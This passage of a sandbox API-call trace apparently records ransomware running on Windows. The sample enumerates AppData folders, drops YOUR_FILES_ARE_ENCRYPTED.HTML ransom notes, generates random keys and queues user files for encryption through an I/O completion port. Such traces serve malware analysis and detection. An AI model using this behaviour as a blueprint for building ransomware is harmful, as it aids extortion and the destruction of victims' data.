param_1=0x19ddd2, param_2="%02X" | out: param_1="69") returned 2 [0120.369] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="C4") returned 2 [0120.369] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="1B") returned 2 [0120.369] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="EC") returned 2 [0120.369] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="51") returned 2 [0120.369] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="35") returned 2 [0120.369] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="A6") returned 2 [0120.369] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="B9") returned 2 [0120.369] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="A7") returned 2 [0120.369] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="C2") returned 2 [0120.369] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="62") returned 2 [0120.369] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="32") returned 2 [0120.369] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="C9") returned 2 [0120.369] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="65") returned 2 [0120.369] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="04") returned 2 [0120.369] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="4C") returned 2 [0120.369] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="01") returned 2 [0120.370] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0120.370] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.370] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.370] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x99f5217e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x99f5217e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99f5217e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6b4210, dwReserved1=0x6da3e0, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.370] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.370] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 198 [0120.370] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.370] lstrlenW (lpString=".LOG1") returned 5 [0120.370] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.370] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x99f5217e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x99f5217e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99f5217e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6da3e0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.370] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.370] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 198 [0120.370] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.370] lstrlenW (lpString=".LOG2") returned 5 [0120.370] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.370] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x99f5217e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x99f5217e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99f5217e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6da3e0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.370] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.370] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 203 [0120.370] GetProcessHeap () returned 0x600000 [0120.370] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\microsoft.windowsfeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.371] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.373] CloseHandle (hObject=0x320) returned 1 [0120.373] GetProcessHeap () returned 0x600000 [0120.373] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.373] GetProcessHeap () returned 0x600000 [0120.373] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.373] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99e6d249, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x99e6d249, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99e6d249, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.373] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.373] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 187 [0120.373] GetProcessHeap () returned 0x600000 [0120.373] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\microsoft.windowsfeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.375] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.385] CloseHandle (hObject=0x31c) returned 1 [0120.385] GetProcessHeap () returned 0x600000 [0120.385] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.385] GetProcessHeap () returned 0x600000 [0120.385] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.387] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9989d823, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9989d823, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0120.387] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.387] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\RoamingState") returned 101 [0120.387] GetProcessHeap () returned 0x600000 [0120.387] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.388] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\RoamingState" [0120.388] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\RoamingState\\*" [0120.388] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9989d823, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9989d823, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0120.388] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9989d823, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9989d823, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 1 [0120.388] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9989d823, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9989d823, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 0 [0120.388] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0120.388] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.388] GetProcessHeap () returned 0x600000 [0120.388] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.390] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.391] CloseHandle (hObject=0x31c) returned 1 [0120.391] GetProcessHeap () returned 0x600000 [0120.391] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.391] GetProcessHeap () returned 0x600000 [0120.391] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.391] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0120.391] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.391] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings") returned 97 [0120.391] GetProcessHeap () returned 0x600000 [0120.391] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.391] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings" [0120.391] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\*" [0120.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x93887d0c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0120.396] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x93887d0c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 1 [0120.396] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0120.396] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.396] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\roaming.lock") returned 110 [0120.396] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.396] lstrlenW (lpString=".lock") returned 5 [0120.396] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.396] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x93a51a44, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93a51a44, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0120.396] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.396] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\settings.dat") returned 110 [0120.396] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.397] lstrlenW (lpString=".dat") returned 4 [0120.397] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.397] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0120.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0120.397] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0120.397] GetProcessHeap () returned 0x600000 [0120.398] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.400] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="EA") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="4D") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="01") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="94") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="89") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="CE") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="D5") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="10") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="F7") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="78") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="F5") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="9D") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="BF") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="0A") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="3F") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="9A") returned 2 [0120.400] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="AF") returned 2 [0120.401] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="A2") returned 2 [0120.401] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="8B") returned 2 [0120.401] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="EC") returned 2 [0120.401] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="69") returned 2 [0120.401] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="D0") returned 2 [0120.401] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="AF") returned 2 [0120.401] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="DF") returned 2 [0120.401] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="A9") returned 2 [0120.401] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="B4") returned 2 [0120.401] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="26") returned 2 [0120.401] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="3A") returned 2 [0120.401] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="CC") returned 2 [0120.401] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="AE") returned 2 [0120.401] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="FB") returned 2 [0120.401] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="03") returned 2 [0120.401] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\settings.dat" [0120.401] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.401] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.401] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93887d0c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93887d0c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93887d0c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0120.402] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.402] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 115 [0120.402] 